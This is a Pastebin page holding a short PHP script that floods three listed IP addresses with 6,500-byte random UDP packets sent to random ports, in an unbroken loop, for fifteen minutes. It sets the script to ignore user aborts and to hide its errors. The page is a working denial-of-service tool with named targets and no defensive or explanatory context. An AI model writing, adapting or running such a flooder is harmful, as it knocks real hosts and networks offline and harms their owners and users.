Guest User

Untitled

a guest
May 27th, 2018
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.68 KB | None | 0 0
  1. <?php
  2. // suck our balls, all of our balls
  3. ignore_user_abort(TRUE);
  4. set_time_limit(0);
  5. error_reporting(0);
  6.  
  7. $ip[] = "58.164.76.222";
  8. $ip[] = "124.183.169.109";
  9. $ip[] = "124.184.3.23";
  10.  
  11. $mins = 15;
  12. $psize = 6500;
  13.  
  14. $secs = $mins*60;
  15. $out = "";
  16. for($i=0;$i<$psize;$i++) $out .= chr(mt_rand(1, 256));
  17. $timei = time();
  18. $i = 0;
  19. while (1) {
  20. $fp = fsockopen("udp://{$ip[array_rand($ip)]}", mt_rand(1,65000), $errno, $errstr, 1);
  21. if ($fp) {
  22. fwrite($fp, $out);
  23. fclose($fp);
  24. }
  25. $i++;
  26. if ($i > 5000) {
  27. if (time() - $timei > $secs) exit();
  28. else $i = 0;
  29. }
  30. }
  31. exit();
  32. ?>
Add Comment
Please, Sign In to add comment